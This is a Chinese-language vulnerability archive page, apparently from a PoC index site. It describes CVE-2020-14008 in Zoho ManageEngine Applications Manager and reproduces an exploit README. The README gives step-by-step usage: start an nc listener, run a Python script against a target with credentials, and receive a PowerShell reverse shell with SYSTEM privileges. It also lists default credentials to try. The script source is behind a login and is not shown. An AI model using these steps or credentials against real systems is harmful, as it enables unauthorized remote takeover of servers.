目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1359 元

100%

CVE-2020-14008 PoC — Zoho ManageEngine Applications Manager 代码问题漏洞

来源
关联漏洞
标题: Zoho ManageEngine Applications Manager 代码问题漏洞 (CVE-2020-14008)
Description:ZOHO ManageEngine Applications Manager是美国卓豪(ZOHO)公司的一套IT运维管理解决方案。该产品具有应用性能管理、故障管理、报表生成和SLA管理等功能。 Zoho ManageEngine Applications Manager 14710以及之前版本存在安全漏洞,该漏洞允许攻击者上传易受攻击的jar文件,从而导致远程代码执行。
介绍
# CVE-2020-14008 ManageEngine Exploit

## What is this?
This script exploits CVE-2020-14008 in ManageEngine Applications Manager to get a reverse shell with SYSTEM privileges.

## Requirements
```bash
pip3 install requests urllib3
```

## How to use it

### 1. Start a listener
```bash
nc -nlvp 9001
```

### 2. Run the exploit
```bash
python3 cve-2020-14008-exploit.py <target_url> <username> <password> <your_ip> <your_port>
```

### Examples
```bash
# Direct attack
python3 cve-2020-14008-exploit.py https://192.168.1.100:8443 admin admin 192.168.1.50 9001

# Through port forwarding
python3 cve-2020-14008-exploit.py https://localhost:8443 admin admin 127.0.0.1 9001
```

## Common credentials to try
- `admin:admin`
- `administrator:administrator`
- `guest:guest`

## What you get
- PowerShell reverse shell
- SYSTEM privileges on the target
- Full control of the ManageEngine server 
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →